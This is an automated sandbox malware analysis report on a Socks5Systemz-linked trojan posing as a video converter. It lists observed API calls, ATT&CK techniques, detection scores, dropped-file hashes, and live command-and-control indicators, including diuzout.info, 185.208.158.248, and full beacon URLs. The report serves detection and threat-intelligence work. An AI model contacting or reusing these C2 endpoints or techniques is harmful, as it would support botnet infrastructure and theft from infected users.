Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | API call chain: ExitProcess graph end node (graph_3-18326)
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | API call chain: ExitProcess graph end node (graph_3-18889)
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: 3_2_02D8648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: 3_2_02D99468 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: 3_2_02D8F78E cpuid
Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_004051FC GetLocaleInfoA
Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00405248 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00408570 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004085BC GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_004026C4 GetSystemTime
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00455588 GetUserNameA
Source: C:\Users\user\Desktop\N6jsQ3XNNX.exe | Code function: 0_2_00405CE4 GetVersionExA

Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jennyvideoconverter32_64.exe PID: 2760, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jennyvideoconverter32_64.exe PID: 2760, type: MEMORYSTR
MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques the matrix marks for this sample, with the count badge digits as extracted in parentheses:
Execution: Native API (3), Service Execution (2)
Persistence: DLL Side-Loading (1), Windows Service (5), Bootkit (1)
Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (5), Process Injection (2)
Defense Evasion: Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (21), Timestomp (1), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (1), Process Injection (2), Bootkit (1)
Discovery: System Time Discovery (1), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (35), Security Software Discovery (141), Process Discovery (1), Virtualization/Sandbox Evasion (21), Application Window Discovery (11), System Owner/User Discovery (3), Remote System Discovery (1), System Network Configuration Discovery (1)
Collection: Archive Collected Data (1)
Command and Control: Ingress Tool Transfer (2), Encrypted Channel (2), Non-Standard Port (11), Non-Application Layer Protocol (2), Application Layer Protocol (112)
Impact: System Shutdown/Reboot (1)
Source | Detection | Scanner | Label
N6jsQ3XNNX.exe | 28% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | 100% | Avira | HEUR/AGEN.1329998
C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe | 100% | Avira | HEUR/AGEN.1329998
C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | 100% | Joe Sandbox ML |
C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe | 100% | Joe Sandbox ML |
C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe | 36% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmp | 1% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Jenny Video Converter\is-I6MFQ.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-IR87B.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-KK58F.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Jenny Video Converter\is-MCN70.tmp | 2% | ReversingLabs |
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label
http://www.innosetup.com/ | 0% | URL Reputation | safe
http://www.remobjects.com/psU | 0% | URL Reputation | safe
http://www.remobjects.com/psU | 0% | URL Reputation | safe
http://www.remobjects.com/ps | 0% | URL Reputation | safe
http://185.208.158.248/s | 2% | Virustotal |
http://tukaani.org/xz/ | 0% | Virustotal |
http://31.214.157.226/rand | 0% | Virustotal |
http://tukaani.org/ | 0% | Virustotal |
http://mingw-w64.sourceforge.net/X | 0% | Virustotal |
http://fsf.org/ | 0% | Virustotal |
http://185.208.1 | 0% | Virustotal |
http://www.gnu.org/licenses/ | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
diuzout.info | 185.208.158.248 | true | true | | unknown
212.20.149.52.in-addr.arpa | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://31.214.157.226/rand | false | | unknown
http://diuzout.info/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c5ec93993c | true | | unknown
http://diuzout.info/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 | true | | unknown
diuzout.info | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.dr | false | URL Reputation: safe | unknown
http://185.208.158.248/s | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://tukaani.org/ | is-7MVDI.tmp.2.dr | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df22 | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.remobjects.com/psU | N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.dr | false | URL Reputation: safe, URL Reputation: safe | unknown
http://tukaani.org/xz/ | is-7MVDI.tmp.2.dr | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df220160 | jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12e | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://mingw-w64.sourceforge.net/X | is-73S5T.tmp.2.dr | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d | jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51?a | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.208.158.248/search/?qbn1 | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.remobjects.com/ps | N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.dr | false | URL Reputation: safe | unknown
http://fsf.org/ | N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5 | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.208.158.248/search/?q | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948 | jennyvideoconverter32_64.exe, 00000003.00000002.3337778653.00000000033CD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd8Yo | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.208.1 | jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.gnu.org/licenses/ | N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmp, is-DDT59.tmp.2.dr | false | | unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.208.158.248 | diuzout.info | Switzerland | 34888 | SIMPLECARRER2IT | true
31.214.157.226 | unknown | Germany | 58329 | RACKPLACEDE | false
89.105.201.183 | unknown | Netherlands | 24875 | NOVOSERVE-ASNL | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1528604
                                      Start date and time:2024-10-08 04:12:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 27s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:N6jsQ3XNNX.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:46d2e28be5ad34097672b73bfa78e805.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@6/69@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 196
                                      • Number of non-executed functions: 247
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
22:13:31 | API Interceptor | 527521x Sleep call for process: jennyvideoconverter32_64.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.208.158.248 | etwSnBeIC2.exe | malicious | Socks5Systemz | -
185.208.158.248 | ZFllSoXpoT.exe | malicious | Socks5Systemz | -
185.208.158.248 | OTC71Ny3Ta.exe | malicious | Socks5Systemz | -
185.208.158.248 | Ui6sm6N5JG.exe | malicious | Socks5Systemz | -
185.208.158.248 | ITJ8wVQL5s.exe | malicious | Socks5Systemz | -
185.208.158.248 | AyiNxJ98mL.exe | malicious | Socks5Systemz | -
185.208.158.248 | 0IQmaTXO62.exe | malicious | Socks5Systemz | -
185.208.158.248 | 2d3on76vhf.exe | malicious | Socks5Systemz | -
185.208.158.248 | Dw0MqzrLWq.exe | malicious | Socks5Systemz | -
185.208.158.248 | noode.exe | malicious | Socks5Systemz | -
31.214.157.226 | cv viewer plugin 8.31.40.exe | malicious | Socks5Systemz | 31.214.157.226/rand
89.105.201.183 | cv viewer plugin 8.31.40.exe | malicious | Socks5Systemz | 200
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RACKPLACEDE | 5nv1p4kFmC.exe | malicious | Socks5Systemz | 31.214.157.42
RACKPLACEDE | QnWrzyeT88.exe | malicious | Socks5Systemz | 31.214.157.42
RACKPLACEDE | cv viewer plugin 8.31.40.exe | malicious | Socks5Systemz | 31.214.157.226
RACKPLACEDE | REMITTANCE-NOTICE-For-Norriselectricxslx.pdf | malicious | Unknown | 31.214.157.73
RACKPLACEDE | ELECTRONIC RECEIPT_Servier.html | malicious | Unknown | 31.214.157.167
RACKPLACEDE | http://0nlinenfidiesnsdiffu9ehwsxmcmv1kgpeiwush0rfvtdgs2.omega-wls.com | malicious | Unknown | 31.214.157.167
RACKPLACEDE | ELECTRONIC RECEIPT_Pvtgroup.html | malicious | Unknown | 31.214.157.167
RACKPLACEDE | 3WfBfFhuhG.exe | malicious | Socks5Systemz | 31.214.157.103
RACKPLACEDE | pjczQr2H3P.exe | malicious | Socks5Systemz | 31.214.157.103
RACKPLACEDE | 9TSh73ulR1.exe | malicious | Socks5Systemz | 31.214.157.103
NOVOSERVE-ASNL | SxohdOZiA2.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | etwSnBeIC2.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | jyU2NpOg5L.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | ZFllSoXpoT.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | OTC71Ny3Ta.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | ITJ8wVQL5s.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | SQE6u2kmJL.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | sl9B1ty1iL.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | okkWFXQP0G.exe | malicious | Socks5Systemz | 89.105.201.183
NOVOSERVE-ASNL | xW98tuRe0i.exe | malicious | Socks5Systemz | 89.105.201.183
SIMPLECARRER2IT | SxohdOZiA2.exe | malicious | Socks5Systemz | 185.196.8.214
SIMPLECARRER2IT | etwSnBeIC2.exe | malicious | Socks5Systemz | 185.208.158.248
SIMPLECARRER2IT | jyU2NpOg5L.exe | malicious | Socks5Systemz | 185.196.8.214
SIMPLECARRER2IT | ZFllSoXpoT.exe | malicious | Socks5Systemz | 185.208.158.248
SIMPLECARRER2IT | fHeDaDg5FQ.exe | malicious | Socks5Systemz | 185.196.8.214
SIMPLECARRER2IT | OTC71Ny3Ta.exe | malicious | Socks5Systemz | 185.208.158.248
SIMPLECARRER2IT | Ui6sm6N5JG.exe | malicious | Socks5Systemz | 185.208.158.248
SIMPLECARRER2IT | ITJ8wVQL5s.exe | malicious | Socks5Systemz | 185.208.158.248
SIMPLECARRER2IT | SQE6u2kmJL.exe | malicious | Socks5Systemz | 185.196.8.214
SIMPLECARRER2IT | sl9B1ty1iL.exe | malicious | Socks5Systemz | 185.196.8.214
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | SxohdOZiA2.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | etwSnBeIC2.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | jyU2NpOg5L.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | ZFllSoXpoT.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | fHeDaDg5FQ.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | OTC71Ny3Ta.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | Ui6sm6N5JG.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | ITJ8wVQL5s.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | SQE6u2kmJL.exe | malicious | Socks5Systemz | -
C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp | sl9B1ty1iL.exe | malicious | Socks5Systemz | -
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3296256
                                                                              Entropy (8bit):6.848028383299471
                                                                              Encrypted:false
                                                                              SSDEEP:49152:OPCE+ilwRfPKC1XeoIFEDxeCrijlZ3ivBjgBEAf05gJVKQ28g:4+hRHF5IcxeCrijlZkxgBEAf02L28g
                                                                              MD5:65FDD2B7C5D23EEF202604FCFEFD2FF4
                                                                              SHA1:1E13A70CFCA55D95EF41BBE4F9B3BCE49F801F52
                                                                              SHA-256:1CCC772B688396131DA8841478256D0ED7B7223EA2FEA006FB9F32B14281BB52
                                                                              SHA-512:F36F2291FC1F850703DC75A642806844DDC9CF333192B0B9B5FF90DFE93BC6E6875A62CF918BA9642C6A72AF2BA9A13CCE0176A898C47F5D7A818707D8F862EC
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 36%
                                                                              Reputation:low
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8
                                                                              Entropy (8bit):2.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:V8/l:W
                                                                              MD5:82E0F9289A3623989779A14FBF90D05E
                                                                              SHA1:6C97C898A6BC08E791A9A2B7783EDA180426525F
                                                                              SHA-256:DDCF194378BE9A2ABFAF4DDBC22ECD36751473F9E8520A7893135AD42BE6EC06
                                                                              SHA-512:A954BBDFB94E558275896441487B8764CF59C0F11A9C64C02EBAB816DE814EB3419CFAC55E62597935DBABA0F19C0243AF62383F83A7EEA65D5FF69A89E57FEE
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):0.8112781244591328
                                                                              Encrypted:false
                                                                              SSDEEP:3:cln:Un
                                                                              MD5:2DC89ABB98D04AF2C94CC8B59EBD2B63
                                                                              SHA1:C2568696F7E531313A1300CA830F7051E1A85475
                                                                              SHA-256:8D4CD219A8179C66ACD195D0F07C34721C87ED2241A9DE78A228B7B336488BC8
                                                                              SHA-512:5085394D311E525AC7B549D4353FDDAAB0BFBA3C291F4B031BA27A0EDD5B71D4DF15BC030CDB7BF09EA3CBDB858F193C9EE5302131F4A823F4CC961F1ADC0AF0
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):128
                                                                              Entropy (8bit):2.9545817380615236
                                                                              Encrypted:false
                                                                              SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                              MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                              SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                              SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                              SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):128
                                                                              Entropy (8bit):1.7095628900165245
                                                                              Encrypted:false
                                                                              SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                              MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                              SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                              SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
